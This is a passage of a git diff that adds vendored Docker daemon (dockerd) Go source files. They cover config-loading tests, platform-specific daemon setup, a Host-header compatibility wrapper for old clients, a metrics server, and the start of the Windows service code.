+func notifyShutdown(err error) { +} + +func wrapListeners(proto string, ls []net.Listener) []net.Listener { + return ls +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go new file mode 100644 index 0000000000..b364f87843 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_test.go @@ -0,0 +1,145 @@ +package main + +import ( + "testing" + + "github.com/Sirupsen/logrus" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/daemon" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/pkg/testutil/tempfile" + "github.com/spf13/pflag" +) + +func defaultOptions(configFile string) daemonOptions { + opts := daemonOptions{ + daemonConfig: &daemon.Config{}, + flags: &pflag.FlagSet{}, + common: cliflags.NewCommonOptions(), + } + opts.common.InstallFlags(opts.flags) + opts.daemonConfig.InstallFlags(opts.flags) + opts.flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "") + opts.configFile = configFile + return opts +} + +func TestLoadDaemonCliConfigWithoutOverriding(t *testing.T) { + opts := defaultOptions("") + opts.common.Debug = true + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + if !loadedConfig.Debug { + t.Fatalf("expected debug to be copied from the common flags, got false") + } +} + +func TestLoadDaemonCliConfigWithTLS(t *testing.T) { + opts := defaultOptions("") + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + opts.common.TLS = true + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/tmp/ca.pem") +} + +func TestLoadDaemonCliConfigWithConflicts(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"labels": ["l3=foo"]}`) + defer tempFile.Remove() + configFile := tempFile.Name() + + opts := 
defaultOptions(configFile) + flags := opts.flags + + assert.NilError(t, flags.Set(flagDaemonConfigFile, configFile)) + assert.NilError(t, flags.Set("label", "l1=bar")) + assert.NilError(t, flags.Set("label", "l2=baz")) + + _, err := loadDaemonCliConfig(opts) + assert.Error(t, err, "as a flag and in the configuration file: labels") +} + +func TestLoadDaemonCliConfigWithTLSVerify(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": true}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.TLS, true) +} + +func TestLoadDaemonCliConfigWithExplicitTLSVerifyFalse(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"tlsverify": false}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.TLS, true) +} + +func TestLoadDaemonCliConfigWithoutTLSVerify(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.TLSOptions.CAFile = "/tmp/ca.pem" + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.TLS, false) +} + +func TestLoadDaemonCliConfigWithLogLevel(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{"log-level": "warn"}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.LogLevel, "warn") + assert.Equal(t, logrus.GetLevel(), logrus.WarnLevel) +} + +func 
TestLoadDaemonConfigWithEmbeddedOptions(t *testing.T) { + content := `{"tlscacert": "/etc/certs/ca.pem", "log-driver": "syslog"}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.CommonTLSOptions.CAFile, "/etc/certs/ca.pem") + assert.Equal(t, loadedConfig.LogConfig.Type, "syslog") +} + +func TestLoadDaemonConfigWithRegistryOptions(t *testing.T) { + content := `{ + "registry-mirrors": ["https://mirrors.docker.com"], + "insecure-registries": ["https://insecure.docker.com"] + }` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + + assert.Equal(t, len(loadedConfig.Mirrors), 1) + assert.Equal(t, len(loadedConfig.InsecureRegistries), 1) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go new file mode 100644 index 0000000000..bdce98bd26 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix.go @@ -0,0 +1,137 @@ +// +build !windows,!solaris + +package main + +import ( + "fmt" + "net" + "os" + "os/signal" + "path/filepath" + "strconv" + "syscall" + + "github.com/docker/docker/cmd/dockerd/hack" + "github.com/docker/docker/daemon" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/system" + "github.com/docker/libnetwork/portallocator" +) + +const defaultDaemonConfigFile = "/etc/docker/daemon.json" + +// currentUserIsOwner checks whether the current user is the owner of the given +// file. 
+func currentUserIsOwner(f string) bool { + if fileInfo, err := system.Stat(f); err == nil && fileInfo != nil { + if int(fileInfo.UID()) == os.Getuid() { + return true + } + } + return false +} + +// setDefaultUmask sets the umask to 0022 to avoid problems +// caused by custom umask +func setDefaultUmask() error { + desiredUmask := 0022 + syscall.Umask(desiredUmask) + if umask := syscall.Umask(desiredUmask); umask != desiredUmask { + return fmt.Errorf("failed to set umask: expected %#o, got %#o", desiredUmask, umask) + } + + return nil +} + +func getDaemonConfDir(_ string) string { + return "/etc/docker" +} + +// setupConfigReloadTrap configures the USR2 signal to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { + c := make(chan os.Signal, 1) + signal.Notify(c, syscall.SIGHUP) + go func() { + for range c { + cli.reloadConfig() + } + }() +} + +func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { + opts := []libcontainerd.RemoteOption{ + libcontainerd.WithDebugLog(cli.Config.Debug), + libcontainerd.WithOOMScore(cli.Config.OOMScoreAdjust), + } + if cli.Config.ContainerdAddr != "" { + opts = append(opts, libcontainerd.WithRemoteAddr(cli.Config.ContainerdAddr)) + } else { + opts = append(opts, libcontainerd.WithStartDaemon(true)) + } + if daemon.UsingSystemd(cli.Config) { + args := []string{"--systemd-cgroup=true"} + opts = append(opts, libcontainerd.WithRuntimeArgs(args)) + } + if cli.Config.LiveRestoreEnabled { + opts = append(opts, libcontainerd.WithLiveRestore(true)) + } + opts = append(opts, libcontainerd.WithRuntimePath(daemon.DefaultRuntimeBinary)) + return opts +} + +// getLibcontainerdRoot gets the root directory for libcontainerd/containerd to +// store their state. 
+func (cli *DaemonCli) getLibcontainerdRoot() string { + return filepath.Join(cli.Config.ExecRoot, "libcontainerd") +} + +// getSwarmRunRoot gets the root directory for swarm to store runtime state +// For example, the control socket +func (cli *DaemonCli) getSwarmRunRoot() string { + return filepath.Join(cli.Config.ExecRoot, "swarm") +} + +// allocateDaemonPort ensures that there are no containers +// that try to use any port allocated for the docker server. +func allocateDaemonPort(addr string) error { + host, port, err := net.SplitHostPort(addr) + if err != nil { + return err + } + + intPort, err := strconv.Atoi(port) + if err != nil { + return err + } + + var hostIPs []net.IP + if parsedIP := net.ParseIP(host); parsedIP != nil { + hostIPs = append(hostIPs, parsedIP) + } else if hostIPs, err = net.LookupIP(host); err != nil { + return fmt.Errorf("failed to lookup %s address in host specification", host) + } + + pa := portallocator.Get() + for _, hostIP := range hostIPs { + if _, err := pa.RequestPort(hostIP, "tcp", intPort); err != nil { + return fmt.Errorf("failed to allocate daemon listening port %d (err: %v)", intPort, err) + } + } + return nil +} + +// notifyShutdown is called after the daemon shuts down but before the process exits. 
+func notifyShutdown(err error) { +} + +func wrapListeners(proto string, ls []net.Listener) []net.Listener { + switch proto { + case "unix": + ls[0] = &hack.MalformedHostHeaderOverride{ls[0]} + case "fd": + for i := range ls { + ls[i] = &hack.MalformedHostHeaderOverride{ls[i]} + } + } + return ls +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go new file mode 100644 index 0000000000..d66dba77e1 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_unix_test.go @@ -0,0 +1,114 @@ +// +build !windows,!solaris + +// TODO: Create new file for Solaris which tests config parameters +// as described in daemon/config_solaris.go + +package main + +import ( + "github.com/docker/docker/daemon" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/pkg/testutil/tempfile" + "testing" +) + +func TestLoadDaemonCliConfigWithDaemonFlags(t *testing.T) { + content := `{"log-opts": {"max-size": "1k"}}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + opts.common.Debug = true + opts.common.LogLevel = "info" + assert.NilError(t, opts.flags.Set("selinux-enabled", "true")) + + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + + assert.Equal(t, loadedConfig.Debug, true) + assert.Equal(t, loadedConfig.LogLevel, "info") + assert.Equal(t, loadedConfig.EnableSelinuxSupport, true) + assert.Equal(t, loadedConfig.LogConfig.Type, "json-file") + assert.Equal(t, loadedConfig.LogConfig.Config["max-size"], "1k") +} + +func TestLoadDaemonConfigWithNetwork(t *testing.T) { + content := `{"bip": "127.0.0.2", "ip": "127.0.0.1"}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + 
assert.NotNil(t, loadedConfig) + + assert.Equal(t, loadedConfig.IP, "127.0.0.2") + assert.Equal(t, loadedConfig.DefaultIP.String(), "127.0.0.1") +} + +func TestLoadDaemonConfigWithMapOptions(t *testing.T) { + content := `{ + "cluster-store-opts": {"kv.cacertfile": "/var/lib/docker/discovery_certs/ca.pem"}, + "log-opts": {"tag": "test"} +}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.NotNil(t, loadedConfig.ClusterOpts) + + expectedPath := "/var/lib/docker/discovery_certs/ca.pem" + assert.Equal(t, loadedConfig.ClusterOpts["kv.cacertfile"], expectedPath) + assert.NotNil(t, loadedConfig.LogConfig.Config) + assert.Equal(t, loadedConfig.LogConfig.Config["tag"], "test") +} + +func TestLoadDaemonConfigWithTrueDefaultValues(t *testing.T) { + content := `{ "userland-proxy": false }` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.NotNil(t, loadedConfig.ClusterOpts) + + assert.Equal(t, loadedConfig.EnableUserlandProxy, false) + + // make sure reloading doesn't generate configuration + // conflicts after normalizing boolean values. 
+ reload := func(reloadedConfig *daemon.Config) { + assert.Equal(t, reloadedConfig.EnableUserlandProxy, false) + } + assert.NilError(t, daemon.ReloadConfiguration(opts.configFile, opts.flags, reload)) +} + +func TestLoadDaemonConfigWithTrueDefaultValuesLeaveDefaults(t *testing.T) { + tempFile := tempfile.NewTempFile(t, "config", `{}`) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.NotNil(t, loadedConfig.ClusterOpts) + + assert.Equal(t, loadedConfig.EnableUserlandProxy, true) +} + +func TestLoadDaemonConfigWithLegacyRegistryOptions(t *testing.T) { + content := `{"disable-legacy-registry": true}` + tempFile := tempfile.NewTempFile(t, "config", content) + defer tempFile.Remove() + + opts := defaultOptions(tempFile.Name()) + loadedConfig, err := loadDaemonCliConfig(opts) + assert.NilError(t, err) + assert.NotNil(t, loadedConfig) + assert.Equal(t, loadedConfig.V2Only, true) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go new file mode 100644 index 0000000000..4cccd32688 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/daemon_windows.go @@ -0,0 +1,92 @@ +package main + +import ( + "fmt" + "net" + "os" + "path/filepath" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/libcontainerd" + "github.com/docker/docker/pkg/system" +) + +var defaultDaemonConfigFile = "" + +// currentUserIsOwner checks whether the current user is the owner of the given +// file. 
+func currentUserIsOwner(f string) bool { + return false +} + +// setDefaultUmask doesn't do anything on windows +func setDefaultUmask() error { + return nil +} + +func getDaemonConfDir(root string) string { + return filepath.Join(root, `\config`) +} + +// notifySystem sends a message to the host when the server is ready to be used +func notifySystem() { + if service != nil { + err := service.started() + if err != nil { + logrus.Fatal(err) + } + } +} + +// notifyShutdown is called after the daemon shuts down but before the process exits. +func notifyShutdown(err error) { + if service != nil { + if err != nil { + logrus.Fatal(err) + } + service.stopped(err) + } +} + +// setupConfigReloadTrap configures a Win32 event to reload the configuration. +func (cli *DaemonCli) setupConfigReloadTrap() { + go func() { + sa := syscall.SecurityAttributes{ + Length: 0, + } + ev := "Global\\docker-daemon-config-" + fmt.Sprint(os.Getpid()) + if h, _ := system.CreateEvent(&sa, false, false, ev); h != 0 { + logrus.Debugf("Config reload - waiting signal at %s", ev) + for { + syscall.WaitForSingleObject(h, syscall.INFINITE) + cli.reloadConfig() + } + } + }() +} + +func (cli *DaemonCli) getPlatformRemoteOptions() []libcontainerd.RemoteOption { + return nil +} + +// getLibcontainerdRoot gets the root directory for libcontainerd to store its +// state. The Windows libcontainerd implementation does not need to write a spec +// or state to disk, so this is a no-op. 
+func (cli *DaemonCli) getLibcontainerdRoot() string { + return "" +} + +// getSwarmRunRoot gets the root directory for swarm to store runtime state +// For example, the control socket +func (cli *DaemonCli) getSwarmRunRoot() string { + return "" +} + +func allocateDaemonPort(addr string) error { + return nil +} + +func wrapListeners(proto string, ls []net.Listener) []net.Listener { + return ls +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker.go b/vendor/github.com/docker/docker/cmd/dockerd/docker.go new file mode 100644 index 0000000000..60742ae927 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker.go @@ -0,0 +1,110 @@ +package main + +import ( + "fmt" + "os" + "path/filepath" + "runtime" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/cli" + cliflags "github.com/docker/docker/cli/flags" + "github.com/docker/docker/daemon" + "github.com/docker/docker/dockerversion" + "github.com/docker/docker/pkg/reexec" + "github.com/docker/docker/pkg/term" + "github.com/spf13/cobra" + "github.com/spf13/pflag" +) + +type daemonOptions struct { + version bool + configFile string + daemonConfig *daemon.Config + common *cliflags.CommonOptions + flags *pflag.FlagSet +} + +func newDaemonCommand() *cobra.Command { + opts := daemonOptions{ + daemonConfig: daemon.NewConfig(), + common: cliflags.NewCommonOptions(), + } + + cmd := &cobra.Command{ + Use: "dockerd [OPTIONS]", + Short: "A self-sufficient runtime for containers.", + SilenceUsage: true, + SilenceErrors: true, + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + opts.flags = cmd.Flags() + return runDaemon(opts) + }, + } + cli.SetupRootCommand(cmd) + + flags := cmd.Flags() + flags.BoolVarP(&opts.version, "version", "v", false, "Print version information and quit") + flags.StringVar(&opts.configFile, flagDaemonConfigFile, defaultDaemonConfigFile, "Daemon configuration file") + opts.common.InstallFlags(flags) + opts.daemonConfig.InstallFlags(flags) + 
installServiceFlags(flags) + + return cmd +} + +func runDaemon(opts daemonOptions) error { + if opts.version { + showVersion() + return nil + } + + daemonCli := NewDaemonCli() + + // Windows specific settings as these are not defaulted. + if runtime.GOOS == "windows" { + if opts.daemonConfig.Pidfile == "" { + opts.daemonConfig.Pidfile = filepath.Join(opts.daemonConfig.Root, "docker.pid") + } + if opts.configFile == "" { + opts.configFile = filepath.Join(opts.daemonConfig.Root, `config\daemon.json`) + } + } + + // On Windows, this may be launching as a service or with an option to + // register the service. + stop, err := initService(daemonCli) + if err != nil { + logrus.Fatal(err) + } + + if stop { + return nil + } + + err = daemonCli.start(opts) + notifyShutdown(err) + return err +} + +func showVersion() { + fmt.Printf("Docker version %s, build %s\n", dockerversion.Version, dockerversion.GitCommit) +} + +func main() { + if reexec.Init() { + return + } + + // Set terminal emulation based on platform as required. + _, stdout, stderr := term.StdStreams() + logrus.SetOutput(stderr) + + cmd := newDaemonCommand() + cmd.SetOutput(stdout) + if err := cmd.Execute(); err != nil { + fmt.Fprintf(stderr, "%s\n", err) + os.Exit(1) + } +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go new file mode 100644 index 0000000000..19c5587cb6 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/docker_windows.go @@ -0,0 +1,18 @@ +package main + +import ( + "sync/atomic" + + _ "github.com/docker/docker/autogen/winresources/dockerd" +) + +//go:cgo_import_dynamic main.dummy CommandLineToArgvW%2 "shell32.dll" + +var dummy uintptr + +func init() { + // Ensure that this import is not removed by the linker. This is used to + // ensure that shell32.dll is loaded by the system loader, preventing + // go#15286 from triggering on Nano Server TP5. 
+ atomic.LoadUintptr(&dummy) +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go new file mode 100644 index 0000000000..d4aa3ddd73 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override.go @@ -0,0 +1,121 @@ +// +build !windows + +package hack + +import "net" + +// MalformedHostHeaderOverride is a wrapper to be able +// to overcome the 400 Bad request coming from old docker +// clients that send an invalid Host header. +type MalformedHostHeaderOverride struct { + net.Listener +} + +// MalformedHostHeaderOverrideConn wraps the underlying unix +// connection and keeps track of the first read from http.Server +// which just reads the headers. +type MalformedHostHeaderOverrideConn struct { + net.Conn + first bool +} + +var closeConnHeader = []byte("\r\nConnection: close\r") + +// Read reads the first *read* request from http.Server to inspect +// the Host header. If the Host starts with / then we're talking to +// an old docker client which send an invalid Host header. To not +// error out in http.Server we rewrite the first bytes of the request +// to sanitize the Host header itself. +// In case we're not dealing with old docker clients the data is just passed +// to the server w/o modification. +func (l *MalformedHostHeaderOverrideConn) Read(b []byte) (n int, err error) { + // http.Server uses a 4k buffer + if l.first && len(b) == 4096 { + // This keeps track of the first read from http.Server which just reads + // the headers + l.first = false + // The first read of the connection by http.Server is done limited to + // DefaultMaxHeaderBytes (usually 1 << 20) + 4096. + // Here we do the first read which gets us all the http headers to + // be inspected and modified below. 
+ c, err := l.Conn.Read(b) + if err != nil { + return c, err + } + + var ( + start, end int + firstLineFeed = -1 + buf []byte + ) + for i := 0; i <= c-1-7; i++ { + if b[i] == '\n' && firstLineFeed == -1 { + firstLineFeed = i + } + if b[i] != '\n' { + continue + } + + if b[i+1] == '\r' && b[i+2] == '\n' { + return c, nil + } + + if b[i+1] != 'H' { + continue + } + if b[i+2] != 'o' { + continue + } + if b[i+3] != 's' { + continue + } + if b[i+4] != 't' { + continue + } + if b[i+5] != ':' { + continue + } + if b[i+6] != ' ' { + continue + } + if b[i+7] != '/' { + continue + } + // ensure clients other than the docker clients do not get this hack + if i != firstLineFeed { + return c, nil + } + start = i + 7 + // now find where the value ends + for ii, bbb := range b[start:c] { + if bbb == '\n' { + end = start + ii + break + } + } + buf = make([]byte, 0, c+len(closeConnHeader)-(end-start)) + // strip the value of the host header and + // inject `Connection: close` to ensure we don't reuse this connection + buf = append(buf, b[:start]...) + buf = append(buf, closeConnHeader...) + buf = append(buf, b[end:c]...) + copy(b, buf) + break + } + if len(buf) == 0 { + return c, nil + } + return len(buf), nil + } + return l.Conn.Read(b) +} + +// Accept makes the listener accepts connections and wraps the connection +// in a MalformedHostHeaderOverrideConn initilizing first to true. 
+func (l *MalformedHostHeaderOverride) Accept() (net.Conn, error) { + c, err := l.Listener.Accept() + if err != nil { + return c, err + } + return &MalformedHostHeaderOverrideConn{c, true}, nil +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go new file mode 100644 index 0000000000..1a0a60baf3 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/hack/malformed_host_override_test.go @@ -0,0 +1,124 @@ +// +build !windows + +package hack + +import ( + "bytes" + "io" + "net" + "strings" + "testing" +) + +type bufConn struct { + net.Conn + buf *bytes.Buffer +} + +func (bc *bufConn) Read(b []byte) (int, error) { + return bc.buf.Read(b) +} + +func TestHeaderOverrideHack(t *testing.T) { + tests := [][2][]byte{ + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\n"), + }, + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\nFoo: Bar\r\n"), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\nFoo: Bar\r\n"), + }, + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\ntest something!"), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\ntest something!"), + }, + { + []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\ntest something! " + strings.Repeat("test", 15000)), + []byte("GET /foo\nHost: \r\nConnection: close\r\nUser-Agent: Docker\r\n\r\ntest something! 
" + strings.Repeat("test", 15000)), + }, + { + []byte("GET /foo\nFoo: Bar\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"), + []byte("GET /foo\nFoo: Bar\nHost: /var/run/docker.sock\nUser-Agent: Docker\r\n\r\n"), + }, + } + + // Test for https://github.com/docker/docker/issues/23045 + h0 := "GET /foo\nUser-Agent: Docker\r\n\r\n" + h0 = h0 + strings.Repeat("a", 4096-len(h0)-1) + "\n" + tests = append(tests, [2][]byte{[]byte(h0), []byte(h0)}) + + for _, pair := range tests { + read := make([]byte, 4096) + client := &bufConn{ + buf: bytes.NewBuffer(pair[0]), + } + l := MalformedHostHeaderOverrideConn{client, true} + + n, err := l.Read(read) + if err != nil && err != io.EOF { + t.Fatalf("read: %d - %d, err: %v\n%s", n, len(pair[0]), err, string(read[:n])) + } + if !bytes.Equal(read[:n], pair[1][:n]) { + t.Fatalf("\n%s\n%s\n", read[:n], pair[1][:n]) + } + } +} + +func BenchmarkWithHack(b *testing.B) { + client, srv := net.Pipe() + done := make(chan struct{}) + req := []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\n") + read := make([]byte, 4096) + b.SetBytes(int64(len(req) * 30)) + + l := MalformedHostHeaderOverrideConn{client, true} + go func() { + for { + if _, err := srv.Write(req); err != nil { + srv.Close() + break + } + l.first = true // make sure each subsequent run uses the hack parsing + } + close(done) + }() + + for i := 0; i < b.N; i++ { + for i := 0; i < 30; i++ { + if n, err := l.Read(read); err != nil && err != io.EOF { + b.Fatalf("read: %d - %d, err: %v\n%s", n, len(req), err, string(read[:n])) + } + } + } + l.Close() + <-done +} + +func BenchmarkNoHack(b *testing.B) { + client, srv := net.Pipe() + done := make(chan struct{}) + req := []byte("GET /foo\nHost: /var/run/docker.sock\nUser-Agent: Docker\n") + read := make([]byte, 4096) + b.SetBytes(int64(len(req) * 30)) + + go func() { + for { + if _, err := srv.Write(req); err != nil { + srv.Close() + break + } + } + close(done) + }() + + for i := 0; i < b.N; i++ { + for i := 0; i < 
30; i++ { + if _, err := client.Read(read); err != nil && err != io.EOF { + b.Fatal(err) + } + } + } + client.Close() + <-done +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/metrics.go b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go new file mode 100644 index 0000000000..0c8860408b --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/metrics.go @@ -0,0 +1,27 @@ +package main + +import ( + "net" + "net/http" + + "github.com/Sirupsen/logrus" + metrics "github.com/docker/go-metrics" +) + +func startMetricsServer(addr string) error { + if err := allocateDaemonPort(addr); err != nil { + return err + } + l, err := net.Listen("tcp", addr) + if err != nil { + return err + } + mux := http.NewServeMux() + mux.Handle("/metrics", metrics.Handler()) + go func() { + if err := http.Serve(l, mux); err != nil { + logrus.Errorf("serve metrics api: %s", err) + } + }() + return nil +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go new file mode 100644 index 0000000000..64ad7fcaa0 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_unsupported.go @@ -0,0 +1,14 @@ +// +build !windows + +package main + +import ( + "github.com/spf13/pflag" +) + +func initService(daemonCli *DaemonCli) (bool, error) { + return false, nil +} + +func installServiceFlags(flags *pflag.FlagSet) { +} diff --git a/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go new file mode 100644 index 0000000000..dd37abcf3c --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/dockerd/service_windows.go @@ -0,0 +1,426 @@ +package main + +import ( + "bytes" + "errors" + "fmt" + "io/ioutil" + "os" + "os/exec" + "path/filepath" + "syscall" + "time" + "unsafe" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/system" + "github.com/spf13/pflag" + "golang.org/x/sys/windows" + 
"golang.org/x/sys/windows/svc" + "golang.org/x/sys/windows/svc/debug" + "golang.org/x/sys/windows/svc/eventlog" + "golang.org/x/sys/windows/svc/mgr" +) + +var ( + flServiceName *string + flRegisterService *bool + flUnregisterService *bool + flRunService *bool + + setStdHandle = windows.NewLazySystemDLL("kernel32.dll").NewProc("SetStdHandle") + oldStderr syscall.Handle + panicFile *os.File + + service *handler +) + +const ( + // These should match the values in event_messages.mc. + eventInfo = 1 + eventWarn = 1 + eventError = 1 + eventDebug = 2 + eventPanic = 3 + eventFatal = 4 + + eventExtraOffset = 10 // Add this to any event to get a string that supports extended data +) + +func installServiceFlags(flags *pflag.FlagSet) { + flServiceName = flags.String("service-name", "docker", "Set the Windows service name") + flRegisterService = flags.Bool("register-service", false, "Register the service and exit") + flUnregisterService = flags.Bool("unregister-service", false, "Unregister the service and exit") + flRunService = flags.Bool("run-service", false, "") + flags.MarkHidden("run-service") +} + +type handler struct { + tosvc chan bool + fromsvc chan error + daemonCli *DaemonCli +} + +type etwHook struct { + log *eventlog.Log +} + +func (h *etwHook) Levels() []logrus.Level { + return []logrus.Level{ + logrus.PanicLevel, + logrus.FatalLevel, + logrus.ErrorLevel, + logrus.WarnLevel, + logrus.InfoLevel, + logrus.DebugLevel, + } +} + +func (h *etwHook) Fire(e *logrus.Entry) error { + var ( + etype uint16 + eid uint32 + ) + + switch e.Level { + case logrus.PanicLevel: + etype = windows.EVENTLOG_ERROR_TYPE + eid = eventPanic + case logrus.FatalLevel: + etype = windows.EVENTLOG_ERROR_TYPE + eid = eventFatal + case logrus.ErrorLevel: + etype = windows.EVENTLOG_ERROR_TYPE + eid = eventError + case logrus.WarnLevel: + etype = windows.EVENTLOG_WARNING_TYPE + eid = eventWarn + case logrus.InfoLevel: + etype = windows.EVENTLOG_INFORMATION_TYPE + eid = eventInfo + case 
logrus.DebugLevel: + etype = windows.EVENTLOG_INFORMATION_TYPE + eid = eventDebug + default: + return errors.New("unknown level") + } + + // If there is additional data, include it as a second string. + exts := "" + if len(e.Data) > 0 { + fs := bytes.Buffer{} + for k, v := range e.Data { + fs.WriteString(k) + fs.WriteByte('=') + fmt.Fprint(&fs, v) + fs.WriteByte(' ') + } + + exts = fs.String()[:fs.Len()-1] + eid += eventExtraOffset + } + + if h.log == nil { + fmt.Fprintf(os.Stderr, "%s [%s]\n", e.Message, exts) + return nil + } + + var ( + ss [2]*uint16 + err error + ) + + ss[0], err = syscall.UTF16PtrFromString(e.Message) + if err != nil { + return err + } + + count := uint16(1) + if exts != "" { + ss[1], err = syscall.UTF16PtrFromString(exts) + if err != nil { + return err + } + + count++ + } + + return windows.ReportEvent(h.log.Handle, etype, 0, eid, 0, count, 0, &ss[0], nil) +} + +func getServicePath() (string, error) { + p, err := exec.LookPath(os.Args[0]) + if err != nil { + return "", err + } + return filepath.Abs(p) +} + +func registerService() error { + p, err := getServicePath() + if err != nil { + return err + } + m, err := mgr.Connect() + if err != nil { + return err + } + defer m.Disconnect() + + depends := []string{} + + // This dependency is required on build 14393 (RS1) + // it is added to the platform in newer builds + if system.GetOSVersion().Build == 14393 { + depends = append(depends, "ConDrv") + } + + c := mgr.Config{ + ServiceType: windows.SERVICE_WIN32_OWN_PROCESS, + StartType: mgr.StartAutomatic, + 